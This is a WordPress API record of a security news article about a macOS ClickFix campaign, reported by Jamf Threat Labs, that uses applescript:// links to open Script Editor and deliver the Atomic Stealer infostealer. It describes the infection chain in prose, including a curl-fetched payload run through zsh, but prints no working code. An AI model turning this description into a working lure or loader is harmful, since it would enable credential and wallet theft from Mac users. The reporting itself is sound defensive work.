{"id":7762,"date":"2026-04-09T11:51:29","date_gmt":"2026-04-09T11:51:29","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=7762"},"modified":"2026-04-09T11:51:29","modified_gmt":"2026-04-09T11:51:29","slug":"new-clickfix-variant-bypasses-apple-safeguards-with-one%e2%80%91click-script-execution","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=7762","title":{"rendered":"New ClickFix variant bypasses Apple safeguards with one\u2011click script execution"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<div class=\"container\"><\/div>\n<p>ClickFix malware campaigns are evolving again, with threat actors removing one of their most obvious and user\u2011dependent steps: convincing victims to paste malicious commands into Terminal. Instead, the latest variant uses a single browser click to trigger script execution, streamlining the infection chain and reducing user hesitation.<\/p>\n<p>Researchers at Jamf Threat Labs have identified a new macOS campaign that launches Apple\u2019s native Script Editor directly from the browser, preloaded with malicious code. The technique abuses the applescript:\/\/ URL scheme to open Script Editor automatically, sidestepping Terminal entirely and delivering Atomic Stealer payloads with far less friction.<\/p>\n<p>\u201cScript Editor has a well-documented history as a malware delivery mechanism, so its presence here isn\u2019t<br \/>surprising,\u201d the researchers said in a blog <a href=\"https:\/\/www.jamf.com\/blog\/clickfix-macos-script-editor-atomic-stealer\/\" target=\"_blank\" rel=\"noopener\">post.<\/a> \u201cWhat is notable is its role in this ClickFix campaign and the fact that it was invoked via a URL scheme.\u201d<\/p>\n<p>The payload isn\u2019t new. It\u2019s Atomic Stealer, a credential-harvesting strain commonly deployed in macOS-focused campaigns.<\/p>\n<h2 class=\"wp-block-heading\"><a><\/a>Apple drops protection, attackers go around it<\/h2>\n<p>Conventionally, <a href=\"https:\/\/www.csoonline.com\/article\/4016208\/sixfold-surge-of-clickfix-attacks-threatens-corporate-defenses.html\">ClickFix<\/a> chains relied on social engineering to get users to paste obfuscated commands into Terminal. Apple\u2019s <a href=\"https:\/\/x.com\/ClassicII_MrMac\/status\/2036797948911141129?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E2036797948911141129%7Ctwgr%5Ee38184a3ae3653520299266b2cf56d000e3837e6%7Ctwcon%5Es1_&amp;ref_url=https%3A%2F%2F9to5mac.com%2F2026%2F03%2F25%2Fmacos-26-4-has-new-terminal-popup-warning-when-pasting-commands%2F\" target=\"_blank\" rel=\"noopener\">recent<\/a> protections introduced scanning and prompts around pasted commands, adding restrictions to disrupt that flow.<\/p>\n<p>This campaign routes around it.<\/p>\n<p>Victims are directed to an Apple-themed page posing as a system fix or cleanup guide. Instead of copying anything, they click a button that invokes an applescript:\/\/ URL. That action opens Script Editor with a pre-populated script, ready to execute.<\/p>\n<p>By not directing the user to interact with the Terminal, the attacker has removed a decision point that Apple enforced with macOS Tahoe 26.4. \u201cApple took direct aim at this in macOS 26.4, introducing a security feature that scans commands pasted into Terminal before they\u2019re executed,\u201d the researchers added. \u201cIt\u2019s a meaningful friction point, but as this campaign illustrates, when one door closes, attackers find another.\u201d<\/p>\n<p>Script Editor is a native macOS utility and doesn\u2019t carry the same immediate suspicion as Terminal for non-experienced users. However, there is still some non-targeted resistance to this technique.<\/p>\n<p>The researchers pointed out that the behavior of the Script Editor may vary depending on the macOS version. \u201cOn recent versions of macOS Tahoe, an additional warning prompt is presented, requiring the user to allow the script to be saved to disk before execution,\u201d they said.<\/p>\n<h2 class=\"wp-block-heading\"><a><\/a>Lightweight staging for Atomic Stealer<\/h2>\n<p>Once executed, the AppleScript resolves to an obfuscated shell command. That command decodes a hidden URL, retrieves a remote payload using \u2018curl\u2019, and executes it via \u2018zsh\u2019. From here, standard info-stealing takes over with a \u2018Mach-O\u2019 binary written to a temporary location, its attributes adjusted, permissions set, and execution triggered.<\/p>\n<p>This binary is a new variant of the <a href=\"https:\/\/www.csoonline.com\/article\/3617624\/is-the-tide-turning-on-macos-security.html\">Atomic Stealer<\/a>.<\/p>\n<p>The researchers noted that the staging approach keeps the initial script minimal and less detectable, while the actual malicious logic arrives separately. It is modular, quick to update, and harder to catch at the first stage.<\/p>\n<p>Atomic Stealer\u2019s objectives are <a href=\"https:\/\/www.csoonline.com\/article\/4062342\/macs-go-phishing-as-github-impostors-drop-atomic-stealer.html\">consistent<\/a> with earlier macOS infostealer campaigns, which focused on harvesting browser credentials, saved passwords, crypto wallet data, and developer artifacts. Previous <a href=\"https:\/\/www.csoonline.com\/article\/1308864\/hackers-using-stolen-credentials-to-launch-attacks-as-info-stealing-peaks.html\">reporting<\/a> has shown that such stealers rarely operate in isolation, as exfiltrated data is almost always funneled into credential reuse attacks and account takeovers.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>ClickFix malware campaigns are evolving again, with threat actors removing one of their most obvious and user\u2011dependent steps: convincing victims to paste malicious commands into Terminal. Instead, the latest variant uses a single browser click to trigger script execution, streamlining the infection chain and reducing user hesitation. Researchers at Jamf Threat Labs have identified a [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":7763,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-7762","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7762"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7762"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7762\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/7763"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7762"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7762"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7762"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}